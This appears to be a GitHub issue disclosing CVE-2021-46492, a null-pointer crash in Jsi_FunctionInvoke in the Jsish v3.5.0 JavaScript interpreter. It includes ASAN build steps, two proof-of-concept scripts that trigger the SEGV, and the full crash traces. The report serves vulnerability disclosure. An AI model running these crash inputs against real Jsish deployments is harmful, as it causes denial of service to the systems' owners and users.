Headline
CVE-2021-46492: SEGV src/jsiFunc.c:786 in Jsi_FunctionInvoke · Issue #71 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a SEGV vulnerability via Jsi_FunctionInvoke at src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case1
var feedback = setInterval(Number, update(Object(ch))); WebSocket(new Object()); update(100)(WebSocket(new Object()));
Test case2
function JSEtest() { (arr.reduceRight(Object), 0, ‘1’); arguments.callee++; }
var arr = new Array(10); arr[1] = 1; arr[2] = 2; arr.forEach(JSEtest);
Execution steps & Output
$ ./jsish/jsish poc1.js
ASAN:DEADLYSIGNAL
==82851==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x5639ca50c71f bp 0x000000000000 sp 0x7ffc15eedf60 T0) ==82851==The signal is caused by a READ memory access. ==82851==Hint: address points to the zero page. #0 0x5639ca50c71e in Jsi_FunctionInvoke src/jsiFunc.c:786 #1 0x5639ca626b9d in Jsi_EventProcess src/jsiCmds.c:292 #2 0x5639ca6278ef in SysUpdateCmd src/jsiCmds.c:411 #3 0x5639ca58f818 in jsi_FuncCallSub src/jsiProto.c:244 #4 0x5639ca85971a in jsiFunctionSubCall src/jsiEval.c:796 #5 0x5639ca85971a in jsiEvalFunction src/jsiEval.c:837 #6 0x5639ca85971a in jsiEvalCodeSub src/jsiEval.c:1264 #7 0x5639ca86d15e in jsi_evalcode src/jsiEval.c:2204 #8 0x5639ca871274 in jsi_evalStrFile src/jsiEval.c:2665 #9 0x5639ca56066a in Jsi_Main src/jsiInterp.c:936 #10 0x5639cad6503a in jsi_main src/main.c:47 #11 0x7fb9a888dbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #12 0x5639ca4f4969 in _start (/usr/local/bin/jsish+0xe8969)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/jsiFunc.c:786 in Jsi_FunctionInvoke ==82851==ABORTING
$ ./jsish/jsish poc2.js ASAN:DEADLYSIGNAL ================================================================= ==62010==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557c5b2f56b6 bp 0x603000007240 sp 0x7ffce7e9ef60 T0) ==62010==The signal is caused by a READ memory access. ==62010==Hint: address points to the zero page. #0 0x557c5b2f56b5 in Jsi_FunctionInvoke src/jsiFunc.c:785 #1 0x557c5b3ad784 in jsi_ArrayForeachCmd src/jsiArray.c:531 #2 0x557c5b378818 in jsi_FuncCallSub src/jsiProto.c:244 #3 0x557c5b64271a in jsiFunctionSubCall src/jsiEval.c:796 #4 0x557c5b64271a in jsiEvalFunction src/jsiEval.c:837 #5 0x557c5b64271a in jsiEvalCodeSub src/jsiEval.c:1264 #6 0x557c5b65615e in jsi_evalcode src/jsiEval.c:2204 #7 0x557c5b65a274 in jsi_evalStrFile src/jsiEval.c:2665 #8 0x557c5b34966a in Jsi_Main src/jsiInterp.c:936 #9 0x557c5bb4e03a in jsi_main src/main.c:47 #10 0x7f35df3e6bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #11 0x557c5b2dd969 in _start (/usr/local/bin/jsish+0xe8969)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/jsiFunc.c:785 in Jsi_FunctionInvoke